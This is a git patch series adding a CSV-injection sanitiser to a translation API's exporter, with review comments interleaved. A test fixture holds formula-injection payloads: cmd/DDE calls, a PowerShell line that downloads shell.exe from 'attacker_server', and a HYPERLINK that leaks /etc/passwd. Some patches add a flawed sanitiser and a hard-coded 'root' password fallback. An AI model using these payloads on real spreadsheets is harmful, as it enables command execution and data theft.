From 7e584af384dbd13e1c3b3da42c78111b3c0b1395 Mon Sep 17 00:00:00 2001 From: bvenceslas Date: Wed, 26 Jan 2022 12:50:07 +0200 Subject: [PATCH 01/25] fixed the csv injection vulnerability --- api/package.json | 6 +++--- api/src/config.ts | 2 +- api/src/formatters/csv.ts | 25 ++++++++++++++++++++++++- 3 files changed, 28 insertions(+), 5 deletions(-) diff --git a/api/package.json b/api/package.json index 773a0cec..69625b0b 100644 --- a/api/package.json +++ b/api/package.json @@ -62,7 +62,7 @@ "rxjs": "^7.3.0", "strings-file": "^0.0.5", "swagger-ui-express": "^4.1.6", - "typeorm": "^0.2.37", + "typeorm": "^0.2.37", "xliff": "^5.6.2", "xml-js": "^1.6.11" }, @@ -92,10 +92,10 @@ "ts-node": "^10.2.1", "tsconfig-paths": "^3.11.0", "tslint": "^6.1.3", + "typescript": "4.2.3", "webpack": "^5.37.0", "webpack-cli": "^4.7.0", - "webpack-node-externals": "^1.7.2", - "typescript": "4.2.3" + "webpack-node-externals": "^1.7.2" }, "jest": { "moduleFileExtensions": [ diff --git a/api/src/config.ts b/api/src/config.ts index 8b85ce5b..619fa4b1 100644 --- a/api/src/config.ts +++ b/api/src/config.ts @@ -51,7 +51,7 @@ export const config = { host: env.TR_DB_HOST || '127.0.0.1', port: parseInt(env.TR_DB_PORT, 10) || 3306, username: env.TR_DB_USER || 'root', - password: env.TR_DB_PASSWORD || '', + password: env.TR_DB_PASSWORD || 'root', database: env.TR_DB_DATABASE || 'tr_dev', charset: 'utf8mb4', synchronize: false, diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index b705d191..06b890cd 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts 
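Review bot: A hard-coded `'root'` fallback for the database password does not belong in this commit: `password: env.TR_DB_PASSWORD || 'root'` in `api/src/config.ts` puts a well-known default credential in the source next to the `'root'` username fallback, and it is unrelated to the CSV change named in the subject. It looks like a local development setting committed by accident; PATCH 02/25 reverts it, and the same line returns in PATCH 09/25 before PATCH 10/25 reverts it again. Keep `password: env.TR_DB_PASSWORD || '',` and drop `config.ts` from this commit so that no revision in the history carries a guessable default. The `config` object starts and ends outside the hunk.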
@@ -29,9 +29,32 @@ export const csvParser: Parser = async (data: string) => { }; }; +const csvInjectionProtector = (str: string) => { + const riskyChars = ["=", "+", "-", "@", ",", ";", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]; + + if(!str) return ""; + + const firstChar = str.charAt(0); + const isInjected = riskyChars.includes(firstChar); + if(!isInjected) return str; + + const sliceStr = str.slice(1); + return csvInjectionProtector(sliceStr); +} + export const csvExporter: Exporter = async (data: IntermediateTranslationFormat) => { + + // clear some characters + const protectedTerm = csvInjectionProtector(data.translations[0].term); + const protectedTranslation = csvInjectionProtector(data.translations[0].translation); + + const payload = [{ + term: protectedTerm.replace('0x0d', ''), + translation: protectedTranslation.replace('0x0d', '') + }]; + const rows = await streamAsPromise( - stringify(data.translations, { + stringify((payload), { header: false, }), ); From 1cd211b8d64de8b26c164bc8db8c14196293670b Mon Sep 17 00:00:00 2001 From: RAHUL RATHORE Date: Wed, 26 Jan 2022 16:43:31 +0530 Subject: [PATCH 02/25] fix: remove default password --- api/src/config.ts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/api/src/config.ts b/api/src/config.ts index 619fa4b1..8b85ce5b 100644 --- a/api/src/config.ts +++ b/api/src/config.ts @@ -51,7 +51,7 @@ export const config = { host: env.TR_DB_HOST || '127.0.0.1', port: parseInt(env.TR_DB_PORT, 10) || 3306, username: env.TR_DB_USER || 'root', - password: env.TR_DB_PASSWORD || 'root', + password: env.TR_DB_PASSWORD || '', database: env.TR_DB_DATABASE || 'tr_dev', charset: 'utf8mb4', synchronize: false, From 633958565a4ea6053103f70dafe530e86133010c Mon Sep 17 00:00:00 2001 
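Review bot: `csvExporter` now serialises only `data.translations[0]`, so every translation after the first is dropped from the export and an empty `translations` array throws on `.term`. The sanitiser should be applied to the whole array, e.g. `data.translations.map(t => ({ term: csvInjectionProtector(t.term), translation: csvInjectionProtector(t.translation) }))`. `.replace('0x0d', '')` removes the four-character text `0x0d`, not a carriage return; if the control character is meant, the pattern would be `/\r/g`. The digit entries in `riskyChars` also strip leading numbers from ordinary values, which alters legitimate translations. The same hunk is repeated in PATCH 09/25.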
From: bvenceslas Date: Wed, 26 Jan 2022 14:41:34 +0200 Subject: [PATCH 03/25] refactored the logic --- api/src/config.ts | 2 +- api/src/formatters/csv.ts | 31 ++++++++++++++++--------------- 2 files changed, 17 insertions(+), 16 deletions(-) diff --git a/api/src/config.ts b/api/src/config.ts index 619fa4b1..8b85ce5b 100644 --- a/api/src/config.ts +++ b/api/src/config.ts @@ -51,7 +51,7 @@ export const config = { host: env.TR_DB_HOST || '127.0.0.1', port: parseInt(env.TR_DB_PORT, 10) || 3306, username: env.TR_DB_USER || 'root', - password: env.TR_DB_PASSWORD || 'root', + password: env.TR_DB_PASSWORD || '', database: env.TR_DB_DATABASE || 'tr_dev', charset: 'utf8mb4', synchronize: false, diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index 06b890cd..db18c436 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts 
@@ -30,31 +30,32 @@ export const csvParser: Parser = async (data: string) => { }; const csvInjectionProtector = (str: string) => { - const riskyChars = ["=", "+", "-", "@", ",", ";", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]; + const riskyChars = ["=", "+", "-", "@", ",", ";", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0x0d"]; if(!str) return ""; - const firstChar = str.charAt(0); - const isInjected = riskyChars.includes(firstChar); - if(!isInjected) return str; + riskyChars.map(risk => { + if(str.includes(risk)){ + str = str.replace(risk, ""); + } + }); - const sliceStr = str.slice(1); - return csvInjectionProtector(sliceStr); + return str; } export const csvExporter: Exporter = async (data: IntermediateTranslationFormat) => { - - // clear some characters - const protectedTerm = csvInjectionProtector(data.translations[0].term); - const protectedTranslation = csvInjectionProtector(data.translations[0].translation); - const payload = [{ - term: protectedTerm.replace('0x0d', ''), - translation: protectedTranslation.replace('0x0d', '') - }]; + const clearedTranslations = []; + data.translations.map(trans => { + const protectedTranslation = { + term: csvInjectionProtector(trans.term), + translation: csvInjectionProtector(trans.translation) + } + clearedTranslations.push(protectedTranslation); + }); const rows = await streamAsPromise( - stringify((payload), { + stringify((clearedTranslations), { header: false, }), ); From b3389ca303ac96d3288c2b4cb876d640b87a0f40 Mon Sep 17 00:00:00 2001 From: bvenceslas Date: Wed, 26 Jan 2022 15:46:41 +0200 Subject: [PATCH 04/25] added some risky characters to escape --- api/src/formatters/csv.ts | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index f7be64f7..91461f44 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts 
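Review bot: `str.replace(risk, "")` with a string pattern removes only the first occurrence, so a value that starts with a repeated trigger character still starts with that character when `csvInjectionProtector` returns, while digits, commas and hyphens are now deleted from anywhere inside ordinary translations. A spreadsheet only evaluates a cell as a formula when it begins with a trigger character, so the check can stay anchored to the start of the value, for example `str.replace(/^[=+\-@\t\r]+/, '')`. `"0x0d"` is the literal text `0x0d`, not the carriage-return character `'\r'`. `riskyChars.map(...)` and `data.translations.map(...)` are used only for their side effects; `forEach`, or returning the mapped array directly, states the intent. The same hunk is repeated in PATCH 10/25.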
@@ -31,7 +31,7 @@ export const csvParser: Parser = async (data: string) => { const csvInjectionProtector = (str: string) => { - const riskyChars = ["=", "+", "-", "@", ",", ";", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0x0d"]; + const riskyChars = ["=", "+", "-", "@", ",", ";", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0x0d", "/C", ".exe", "\\", "/", ".dll"]; if(!str) return ""; riskyChars.map(risk => { @@ -53,6 +53,8 @@ export const csvExporter: Exporter = async (data: IntermediateTranslationFormat) } clearedTranslations.push(protectedTranslation); }); + + console.log('clearedTranslations >>> ', clearedTranslations); const rows = await streamAsPromise( stringify((clearedTranslations), { From 5b316276cb13abadf1cd030c39b7320421bf5851 Mon Sep 17 00:00:00 2001 From: bvenceslas Date: Wed, 26 Jan 2022 16:24:17 +0200 Subject: [PATCH 05/25] removed the console.log --- api/src/formatters/csv.ts | 3 --- 1 file changed, 3 deletions(-) diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index 91461f44..4d110b09 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts @@ -53,9 +53,6 @@ export const csvExporter: Exporter = async (data: IntermediateTranslationFormat) } clearedTranslations.push(protectedTranslation); }); - - console.log('clearedTranslations >>> ', clearedTranslations); - const rows = await streamAsPromise( stringify((clearedTranslations), { header: false, From 1fc234af481d445ab28fb072aa8572dcf7b5bb4f Mon Sep 17 00:00:00 2001 From: bvenceslas Date: Wed, 26 Jan 2022 20:28:57 +0200 Subject: [PATCH 06/25] fix the deepscan warning --- api/src/formatters/csv.ts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index 4d110b09..269936cc 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts 
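Review bot: Adding substrings such as `".exe"`, `".dll"`, `"/"` and `"\\"` to `riskyChars` extends a denylist that cannot be completed and that already alters legitimate text: any translation containing a URL or a path loses its first slash. What makes a spreadsheet treat a cell as a formula is its leading character, so the list is better reduced to the start-of-cell triggers (`=`, `+`, `-`, `@`, tab, carriage return) than grown with payload fragments. The second hunk's `console.log('clearedTranslations >>> ', clearedTranslations)` writes every exported string to the server log and should not be committed; PATCH 05/25 removes it. The same list change is repeated in PATCH 11/25.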
@@ -36,7 +36,7 @@ const csvInjectionProtector = (str: string) => { riskyChars.map(risk => { if(str.includes(risk)){ - str = str.replace(risk, ""); + return str = str.replace(risk, ""); } }); From c8e8e4ff3b2b6ee5294c6ededba852a2387a12ef Mon Sep 17 00:00:00 2001 From: snyk-bot Date: Thu, 27 Jan 2022 00:32:40 +0000 Subject: [PATCH 07/25] fix: api/package.json & api/yarn.lock to reduce vulnerabilities The following vulnerabilities are fixed with an upgrade: - https://snyk.io/vuln/SNYK-JS-SWAGGERUIDIST-2314884 --- api/package.json | 2 +- api/yarn.lock | 18 +++++++++--------- 2 files changed, 10 insertions(+), 10 deletions(-) diff --git a/api/package.json b/api/package.json index 773a0cec..71a51a2b 100644 --- a/api/package.json +++ b/api/package.json @@ -61,7 +61,7 @@ "reflect-metadata": "^0.1.13", "rxjs": "^7.3.0", "strings-file": "^0.0.5", - "swagger-ui-express": "^4.1.6", + "swagger-ui-express": "^4.2.0", "typeorm": "^0.2.37", "xliff": "^5.6.2", "xml-js": "^1.6.11" diff --git a/api/yarn.lock b/api/yarn.lock index acc405c1..239c84e2 100644 --- a/api/yarn.lock +++ b/api/yarn.lock 
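Review bot: `return str = str.replace(risk, "");` quiets the analyser without fixing what it flagged: the callback still returns `undefined` when the `if` is false, the array built by `riskyChars.map` is discarded, and the loop works by reassigning the `str` parameter. A `for (const risk of riskyChars)` loop over a local copy, or `riskyChars.reduce((s, risk) => s.replace(risk, ''), str)`, expresses the same behaviour without the assignment inside `return`. `csvInjectionProtector` starts and ends outside the hunk.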
@@ -5246,17 +5246,17 @@ supports-hyperlinks@^2.0.0: has-flag "^4.0.0" supports-color "^7.0.0" -swagger-ui-dist@^3.18.1: - version "3.52.2" - resolved "https://registry.yarnpkg.com/swagger-ui-dist/-/swagger-ui-dist-3.52.2.tgz#30ed9cfa64043651b62f7662681181e21abf0fe2" - integrity sha512-k6QsJqDxfkMlelFUobIKRggR9y5BPvhr/ok9IUPlpnAQsytCx8SSKtNOFkf+W5yZi1Zh6X8GAz2picmmvZBSIw== +swagger-ui-dist@>=4.1.3: + version "4.3.0" + resolved "https://registry.yarnpkg.com/swagger-ui-dist/-/swagger-ui-dist-4.3.0.tgz#f969bdf8891e39bf7b3310a2091aca58e99ed5fd" + integrity sha512-RY1c3y6uuHBTu4nZPXcvrv9cnKj6MbaNMZK1NDyGHrUbQOO5WmkuMo6wi93WFzSURJk0SboD1X9nM5CtQAu2Og== -swagger-ui-express@^4.1.6: - version "4.1.6" - resolved "https://registry.yarnpkg.com/swagger-ui-express/-/swagger-ui-express-4.1.6.tgz#682294af3d5c70f74a1fa4d6a9b503a9ee55ea82" - integrity sha512-Xs2BGGudvDBtL7RXcYtNvHsFtP1DBFPMJFRxHe5ez/VG/rzVOEjazJOOSc/kSCyxreCTKfJrII6MJlL9a6t8vw== +swagger-ui-express@^4.2.0: + version "4.3.0" + resolved "https://registry.yarnpkg.com/swagger-ui-express/-/swagger-ui-express-4.3.0.tgz#226238ab231f7718f9109d63a66efc3a795618dd" + integrity sha512-jN46SEEe9EoXa3ZgZoKgnSF6z0w3tnM1yqhO4Y+Q4iZVc8JOQB960EZpIAz6rNROrDApVDwcMHR0mhlnc/5Omw== dependencies: - swagger-ui-dist "^3.18.1" + swagger-ui-dist ">=4.1.3" symbol-tree@^3.2.4: version "3.2.4" From 2b24247abe607ab88d3780b685956e3984912414 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 27 Jan 2022 07:33:34 +0000 Subject: [PATCH 08/25] build(deps): bump node-fetch from 2.6.2 to 2.6.7 in /api Bumps [node-fetch](https://github.com/node-fetch/node-fetch) from 2.6.2 to 2.6.7. - [Release notes](https://github.com/node-fetch/node-fetch/releases) - [Commits](https://github.com/node-fetch/node-fetch/compare/v2.6.2...v2.6.7) --- updated-dependencies: - dependency-name: node-fetch dependency-type: indirect ... 
Signed-off-by: dependabot[bot] --- api/yarn.lock | 26 +++++++++++++++++++++++--- 1 file changed, 23 insertions(+), 3 deletions(-) diff --git a/api/yarn.lock b/api/yarn.lock index 239c84e2..c80165e3 100644 --- a/api/yarn.lock +++ b/api/yarn.lock @@ -4075,9 +4075,11 @@ node-addon-api@^3.1.0: integrity sha512-mmcei9JghVNDYydghQmeDX8KoAm0FAiYyIcUt/N4nhyAipB17pllZQDOJD2fotxABnt4Mdz+dKTO7eftLg4d0A== node-fetch@^2.6.1: - version "2.6.2" - resolved "https://registry.yarnpkg.com/node-fetch/-/node-fetch-2.6.2.tgz#986996818b73785e47b1965cc34eb093a1d464d0" - integrity sha512-aLoxToI6RfZ+0NOjmWAgn9+LEd30YCkJKFSyWacNZdEKTit/ZMcKjGkTRo8uWEsnIb/hfKecNPEbln02PdWbcA== + version "2.6.7" + resolved "https://registry.yarnpkg.com/node-fetch/-/node-fetch-2.6.7.tgz#24de9fba827e3b4ae44dc8b20256a379160052ad" + integrity sha512-ZjMPFEfVx5j+y2yF35Kzx5sF7kDzxuDj6ziH4FFbOp87zKDZNx8yExJIb05OGF4Nlt9IHFIMBkRl41VdvcNdbQ== + dependencies: + whatwg-url "^5.0.0" node-int64@^0.4.0: version "0.4.0" @@ -5410,6 +5412,11 @@ tr46@^2.1.0: dependencies: punycode "^2.1.1" +tr46@~0.0.3: + version "0.0.3" + resolved "https://registry.yarnpkg.com/tr46/-/tr46-0.0.3.tgz#8184fd347dac9cdc185992f3a6622e14b9d9ab6a" + integrity sha1-gYT9NH2snNwYWZLzpmIuFLnZq2o= + ts-jest@^27.0.5: version "27.0.5" resolved "https://registry.yarnpkg.com/ts-jest/-/ts-jest-27.0.5.tgz#0b0604e2271167ec43c12a69770f0bb65ad1b750" @@ -5728,6 +5735,11 @@ watchpack@^2.2.0: glob-to-regexp "^0.4.1" graceful-fs "^4.1.2" +webidl-conversions@^3.0.0: + version "3.0.1" + resolved "https://registry.yarnpkg.com/webidl-conversions/-/webidl-conversions-3.0.1.tgz#24534275e2a7bc6be7bc86611cc16ae0a5654871" + integrity sha1-JFNCdeKnvGvnvIZhHMFq4KVlSHE= + webidl-conversions@^5.0.0: version "5.0.0" resolved "https://registry.yarnpkg.com/webidl-conversions/-/webidl-conversions-5.0.0.tgz#ae59c8a00b121543a2acc65c0434f57b0fc11aff" 
@@ -5817,6 +5829,14 @@ whatwg-mimetype@^2.3.0: resolved "https://registry.yarnpkg.com/whatwg-mimetype/-/whatwg-mimetype-2.3.0.tgz#3d4b1e0312d2079879f826aff18dbeeca5960fbf" integrity sha512-M4yMwr6mAnQz76TbJm914+gPpB/nCwvZbJU28cUD6dR004SAxDLOOSUaB1JDRqLtaOV/vi0IC5lEAGFgrjGv/g== +whatwg-url@^5.0.0: + version "5.0.0" + resolved "https://registry.yarnpkg.com/whatwg-url/-/whatwg-url-5.0.0.tgz#966454e8765462e37644d3626f6742ce8b70965d" + integrity sha1-lmRU6HZUYuN2RNNib2dCzotwll0= + dependencies: + tr46 "~0.0.3" + webidl-conversions "^3.0.0" + whatwg-url@^8.0.0, whatwg-url@^8.5.0: version "8.7.0" resolved "https://registry.yarnpkg.com/whatwg-url/-/whatwg-url-8.7.0.tgz#656a78e510ff8f3937bc0bcbe9f5c0ac35941b77" From 31038517a05353455adb870621097225c8e26cab Mon Sep 17 00:00:00 2001 From: bvenceslas Date: Wed, 26 Jan 2022 12:50:07 +0200 Subject: [PATCH 09/25] fixed conflicts from package.json :wq --- api/package.json | 4 ++-- api/src/config.ts | 2 +- api/src/formatters/csv.ts | 25 ++++++++++++++++++++++++- 3 files changed, 27 insertions(+), 4 deletions(-) diff --git a/api/package.json b/api/package.json index 71a51a2b..c2c0e184 100644 --- a/api/package.json +++ b/api/package.json @@ -92,10 +92,10 @@ "ts-node": "^10.2.1", "tsconfig-paths": "^3.11.0", "tslint": "^6.1.3", + "typescript": "4.2.3", "webpack": "^5.37.0", "webpack-cli": "^4.7.0", - "webpack-node-externals": "^1.7.2", - "typescript": "4.2.3" + "webpack-node-externals": "^1.7.2" }, "jest": { "moduleFileExtensions": [ diff --git a/api/src/config.ts b/api/src/config.ts index 8b85ce5b..619fa4b1 100644 --- a/api/src/config.ts +++ b/api/src/config.ts @@ -51,7 +51,7 @@ export const config = { host: env.TR_DB_HOST || '127.0.0.1', port: parseInt(env.TR_DB_PORT, 10) || 3306, username: env.TR_DB_USER || 'root', - password: env.TR_DB_PASSWORD || '', + password: env.TR_DB_PASSWORD || 'root', database: env.TR_DB_DATABASE || 'tr_dev', charset: 'utf8mb4', synchronize: false, 
diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index b705d191..06b890cd 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts @@ -29,9 +29,32 @@ export const csvParser: Parser = async (data: string) => { }; }; +const csvInjectionProtector = (str: string) => { + const riskyChars = ["=", "+", "-", "@", ",", ";", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]; + + if(!str) return ""; + + const firstChar = str.charAt(0); + const isInjected = riskyChars.includes(firstChar); + if(!isInjected) return str; + + const sliceStr = str.slice(1); + return csvInjectionProtector(sliceStr); +} + export const csvExporter: Exporter = async (data: IntermediateTranslationFormat) => { + + // clear some characters + const protectedTerm = csvInjectionProtector(data.translations[0].term); + const protectedTranslation = csvInjectionProtector(data.translations[0].translation); + + const payload = [{ + term: protectedTerm.replace('0x0d', ''), + translation: protectedTranslation.replace('0x0d', '') + }]; + const rows = await streamAsPromise( - stringify(data.translations, { + stringify((payload), { header: false, }), ); From b99bcdc8a728b840bf6c5e728e07f9811dab13b3 Mon Sep 17 00:00:00 2001 From: bvenceslas Date: Wed, 26 Jan 2022 14:41:34 +0200 Subject: [PATCH 10/25] refactored the logic --- api/src/config.ts | 2 +- api/src/formatters/csv.ts | 31 ++++++++++++++++--------------- 2 files changed, 17 insertions(+), 16 deletions(-) diff --git a/api/src/config.ts b/api/src/config.ts index 619fa4b1..8b85ce5b 100644 --- a/api/src/config.ts +++ b/api/src/config.ts @@ -51,7 +51,7 @@ export const config = { host: env.TR_DB_HOST || '127.0.0.1', port: parseInt(env.TR_DB_PORT, 10) || 3306, username: env.TR_DB_USER || 'root', - password: env.TR_DB_PASSWORD || 'root', + password: env.TR_DB_PASSWORD || '', database: env.TR_DB_DATABASE || 'tr_dev', charset: 'utf8mb4', synchronize: false, 
diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index 06b890cd..db18c436 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts @@ -30,31 +30,32 @@ export const csvParser: Parser = async (data: string) => { }; const csvInjectionProtector = (str: string) => { - const riskyChars = ["=", "+", "-", "@", ",", ";", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]; + const riskyChars = ["=", "+", "-", "@", ",", ";", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0x0d"]; if(!str) return ""; - const firstChar = str.charAt(0); - const isInjected = riskyChars.includes(firstChar); - if(!isInjected) return str; + riskyChars.map(risk => { + if(str.includes(risk)){ + str = str.replace(risk, ""); + } + }); - const sliceStr = str.slice(1); - return csvInjectionProtector(sliceStr); + return str; } export const csvExporter: Exporter = async (data: IntermediateTranslationFormat) => { - - // clear some characters - const protectedTerm = csvInjectionProtector(data.translations[0].term); - const protectedTranslation = csvInjectionProtector(data.translations[0].translation); - const payload = [{ - term: protectedTerm.replace('0x0d', ''), - translation: protectedTranslation.replace('0x0d', '') - }]; + const clearedTranslations = []; + data.translations.map(trans => { + const protectedTranslation = { + term: csvInjectionProtector(trans.term), + translation: csvInjectionProtector(trans.translation) + } + clearedTranslations.push(protectedTranslation); + }); const rows = await streamAsPromise( - stringify((payload), { + stringify((clearedTranslations), { header: false, }), ); From f587cfde5238b3e0b2767011265dac4b2d2c6252 Mon Sep 17 00:00:00 2001 From: bvenceslas Date: Wed, 26 Jan 2022 15:46:41 +0200 Subject: [PATCH 11/25] fixed conflict --- api/src/formatters/csv.ts | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index db18c436..65f21f4c 100644 --- a/api/src/formatters/csv.ts 
+++ b/api/src/formatters/csv.ts @@ -31,12 +31,12 @@ export const csvParser: Parser = async (data: string) => { const csvInjectionProtector = (str: string) => { - const riskyChars = ["=", "+", "-", "@", ",", ";", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0x0d"]; + const riskyChars = ["=", "+", "-", "@", ",", ";", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0x0d", "/C", ".exe", "\\", "/", ".dll"]; if(!str) return ""; riskyChars.map(risk => { if(str.includes(risk)){ - str = str.replace(risk, ""); + return str = str.replace(risk, ""); } }); From efa607d94ecfeb70b52deb761df30b60d7779c54 Mon Sep 17 00:00:00 2001 From: bvenceslas Date: Wed, 26 Jan 2022 16:24:17 +0200 Subject: [PATCH 12/25] removed the console.log --- api/src/formatters/csv.ts | 1 - 1 file changed, 1 deletion(-) diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index 65f21f4c..269936cc 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts @@ -53,7 +53,6 @@ export const csvExporter: Exporter = async (data: IntermediateTranslationFormat) } clearedTranslations.push(protectedTranslation); }); - const rows = await streamAsPromise( stringify((clearedTranslations), { header: false, From 975b9fb13bf2e185489dd724716ab790476ed72d Mon Sep 17 00:00:00 2001 From: bvenceslas Date: Thu, 27 Jan 2022 13:11:03 +0200 Subject: [PATCH 13/25] added some comments on the refactored code --- api/src/formatters/csv.ts | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index 269936cc..d84eaf4b 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts 
@@ -1,3 +1,9 @@ +// Copyright (c) 2021-2022 Ever Co. LTD +// Modified code from https://github.com/destromas1/csv-injection-protector +// Originally MIT Licensed +// - see https://github.com/destromas1/csv-injection-protector/blob/master/LICENSE +// - original code `Copyright (c) 2019 Shahjada Talukdar`; + import * as parse from 'csv-parse'; import * as stringify from 'csv-stringify'; import { Exporter, IntermediateTranslationFormat, Parser } from '../domain/formatters'; From 587bd6a582ed9692702b7ff1e87bb554fb8a7abe Mon Sep 17 00:00:00 2001 From: bvenceslas Date: Thu, 27 Jan 2022 16:10:08 +0200 Subject: [PATCH 14/25] added test for the cleaning risky characters --- api/src/formatters/csv.spec.ts | 8 +++++- api/src/formatters/fixtures/cleaned.csv | 7 ++++++ api/src/formatters/fixtures/index.ts | 33 +++++++++++++++++++++++++ 3 files changed, 47 insertions(+), 1 deletion(-) create mode 100644 api/src/formatters/fixtures/cleaned.csv diff --git a/api/src/formatters/csv.spec.ts b/api/src/formatters/csv.spec.ts index 92b9913c..d85cefcd 100644 --- a/api/src/formatters/csv.spec.ts +++ b/api/src/formatters/csv.spec.ts @@ -1,5 +1,5 @@ import { csvExporter, csvParser } from './csv'; -import { loadFixture, simpleFormatFixture } from './fixtures'; +import { loadFixture, riskyPayloads, simpleFormatFixture } from './fixtures'; test('should parse csv files', async () => { const input = loadFixture('simple.csv'); @@ -28,3 +28,9 @@ test('should export csv files', async () => { const expected = loadFixture('simple.csv'); expect(result).toEqual(expected); }); + +test('should remove risky characters from risky payloads and export csv files', async () => { + const result = await csvExporter(riskyPayloads); + const expected = loadFixture('cleaned.csv'); + expect(result).toEqual(expected); +}); diff --git a/api/src/formatters/fixtures/cleaned.csv b/api/src/formatters/fixtures/cleaned.csv new file mode 100644 index 00000000..e4a24c44 --- /dev/null 
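Review bot: The new test in `csv.spec.ts` compares the export with `cleaned.csv` byte for byte, which pins the current stripping output but never states the property the fix is meant to guarantee. Add an assertion that no exported cell begins with `=`, `+`, `-` or `@`, and a fixture row of ordinary text containing digits, hyphens and slashes so that damage to legitimate translations is caught. Every risky value in `riskyPayloads` sits in `term`; at least one should sit in `translation`, since `csvExporter` sanitises both fields.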
+++ b/api/src/formatters/fixtures/cleaned.csv @@ -0,0 +1,7 @@ +DDE ("cmd"" calc";"!A")A0,first +SUM()*cmd|' calc'!A,second +0+cmd|' calc'!A0,third +cmd|' notepad'!'A',fourth +cmd|' powershell IEX(wget attacker_servershell)'!A,fifth +cmd|'c rundll \\.0.0.1\\3\\2\\10'!_xlbgnm.A1,sixth +HYPERLINK(CONCATENATE("http:/.0.0.0:0/.txt?v=" ('file:///etc/passwd'#$passwd.A1)); "testpoc"),seventh diff --git a/api/src/formatters/fixtures/index.ts b/api/src/formatters/fixtures/index.ts index bd6a1352..945561a9 100644 --- a/api/src/formatters/fixtures/index.ts +++ b/api/src/formatters/fixtures/index.ts @@ -25,3 +25,36 @@ export const simpleFormatFixture: IntermediateTranslationFormat = { }, ], }; + +export const riskyPayloads: IntermediateTranslationFormat = { + translations: [ + { + term: 'DDE ("cmd";"/C calc";"!A0")A0', + translation: 'first', + }, + { + term: `@SUM(1+9)*cmd|' /C calc'!A0`, + translation: `second`, + }, + { + term: `=10+20+cmd|' /C calc'!A0`, + translation: `third`, + }, + { + term: `=cmd|' /C notepad'!'A1'`, + translation: `fourth`, + }, + { + term: `=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0`, + translation: `fifth`, + }, + { + term: `=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1`, + translation: `sixth`, + }, + { + term: `=HYPERLINK(CONCATENATE("http://0.0.0.0:80/123.txt?v="; ('file:///etc/passwd'#$passwd.A1));"test-poc")`, + translation: `seventh`, + }, + ], +}; From 8f9112803204ce46b32163bafb73765566fe4f5d Mon Sep 17 00:00:00 2001 From: RAHUL RATHORE Date: Fri, 28 Jan 2022 18:02:11 +0530 Subject: [PATCH 15/25] fix: increased default jest timeout --- api/test/jest-e2e.json | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/api/test/jest-e2e.json b/api/test/jest-e2e.json index e9d912f3..fdb10546 100644 --- a/api/test/jest-e2e.json +++ b/api/test/jest-e2e.json 
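Review bot: The entry labelled `sixth` in `riskyPayloads` is a template literal containing `\3\2\1`, and octal escape sequences are not permitted in untagged template literals, so I would expect the TypeScript compiler to reject `fixtures/index.ts` as written. `\\10` in the same string also yields a single backslash, not the two of a UNC prefix. Write that value with `String.raw` or double every backslash so the fixture holds the text it is meant to; PATCH 16/25 deletes the entry instead, which also removes the only backslash case from the test.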
@@ -1,9 +1,10 @@ { - "moduleFileExtensions": ["js", "json", "ts"], - "rootDir": ".", - "testEnvironment": "node", - "testRegex": ".e2e-spec.ts$", - "transform": { - "^.+\\.(t|j)s$": "ts-jest" - } + "moduleFileExtensions": ["js", "json", "ts"], + "rootDir": ".", + "testEnvironment": "node", + "testTimeout": 30000, + "testRegex": ".e2e-spec.ts$", + "transform": { + "^.+\\.(t|j)s$": "ts-jest" + } } From 54035080ad5eb1f02fb99b9478267258d089aa43 Mon Sep 17 00:00:00 2001 From: RAHUL RATHORE Date: Fri, 28 Jan 2022 21:49:11 +0530 Subject: [PATCH 16/25] fix: deepscan & increased jest timeout --- api/package.json | 1 + api/src/formatters/fixtures/cleaned.csv | 3 +-- api/src/formatters/fixtures/index.ts | 6 +----- yarn.lock | 18 +++++++++--------- 4 files changed, 12 insertions(+), 16 deletions(-) diff --git a/api/package.json b/api/package.json index c2c0e184..2da5f452 100644 --- a/api/package.json +++ b/api/package.json @@ -105,6 +105,7 @@ ], "rootDir": "src", "testRegex": ".spec.ts$", + "testTimeout": 30000, "transform": { "^.+\\.(t|j)s$": "ts-jest" }, diff --git a/api/src/formatters/fixtures/cleaned.csv b/api/src/formatters/fixtures/cleaned.csv index e4a24c44..b81a1f8c 100644 --- a/api/src/formatters/fixtures/cleaned.csv +++ b/api/src/formatters/fixtures/cleaned.csv @@ -3,5 +3,4 @@ 